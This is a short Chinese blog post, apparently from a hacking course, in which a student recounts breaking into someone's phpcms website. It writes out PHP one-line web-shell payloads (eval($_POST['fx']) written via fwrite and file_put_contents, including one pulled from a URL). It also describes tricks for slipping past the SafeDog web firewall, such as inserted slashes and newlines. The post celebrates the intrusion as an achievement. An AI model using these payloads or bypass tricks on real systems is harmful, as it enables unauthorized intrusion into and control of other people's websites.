学员渗透网站案例一
大家好,我是风炫,是暗月的学生 渗透一小站,多凭师傅指点,才有结果,再次感谢师傅
最近PHP学的蛋疼,想日一站,泄欲。于是乎,找到了这个网站
乍一看,好像很NB的站,似乎不是我等小菜等够拿得下的。
呵呵 ,后来发现只是乍一看的感觉,并不是很难
发现程序为phpcms ,这个程序很多大型网站都在使用,但是去年爆出很多文件包含的漏洞………
注册用户后,
发现能命令执行
于是能执行phpinfo() ,我就想用fwrite() 来写马,fwrite(fopen(“1.php”,”w”),”<?php eval($_POST[‘fx’]); ”) ; 写马
But 却出现 了 狗子
肿么办 我很纠结
问了下暗月大牛
知道了方法
fwrite(fopen(“1.php”,”w”),”http://2.txt ”);
这样写有什么用 这是挂在网站上的一句话 ,等下将一句话写入2.txt中
但是 这样写 却写不进去
为什么呢 ?我不知道 可能是安全狗的原因吧
后来问了下别人
在$前加个/就可以写入了
fwrite(fopen(“2.txt”,”w”),”<?php eval(/$_POST[‘fx’]); ”);
在file_put_contents('1.php',file_get_contents("http://网站的相对路劲/2.txt"));
这样去将2.txt 的内容 读入到1.php中
就成了一句话
但是还是拦截了
后来 师傅给我说要这样写马
这个怎么实现呢 在你要换行的字符前面加个/n
就可以了
然后
就不拦截了
之后 不能用菜刀连接,而是用其他客户端连接才可以
结束。
以上是 风炫同学的渗透案例。。。。。。。。。。。
在安全狗的面前 依然屹立不倒 。。。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论